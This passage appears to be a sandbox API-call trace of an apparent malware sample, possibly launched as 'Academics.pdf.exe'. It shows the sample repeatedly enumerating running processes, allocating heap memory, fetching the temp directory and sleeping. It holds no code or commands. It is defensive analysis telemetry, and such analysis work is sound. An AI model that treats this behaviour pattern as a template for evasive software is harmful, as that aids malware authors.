lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0282.489] CloseHandle (hObject=0x294) returned 1 [0282.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.492] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0282.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0282.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0282.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0282.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.502] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0282.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0282.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0282.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0282.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0282.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0282.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0282.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0282.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0282.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0282.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0282.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0282.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0282.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0282.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0282.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0282.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0282.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0282.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0282.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0282.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0282.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0282.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0282.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0282.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0282.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0282.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0282.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0282.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0282.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0282.544] CloseHandle (hObject=0x294) returned 1 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0282.544] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.544] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0282.547] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0282.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0282.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0282.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0282.572] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0282.572] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0282.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0282.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0282.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0282.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0282.573] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0282.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0282.573] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0282.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0282.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0282.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0282.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0282.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0282.574] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0282.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0282.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0282.574] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0282.574] timeGetTime () returned 0x46b4f [0282.574] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0282.574] Sleep (dwMilliseconds=0xa) [0282.581] timeGetTime () returned 0x46b5e [0282.581] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, 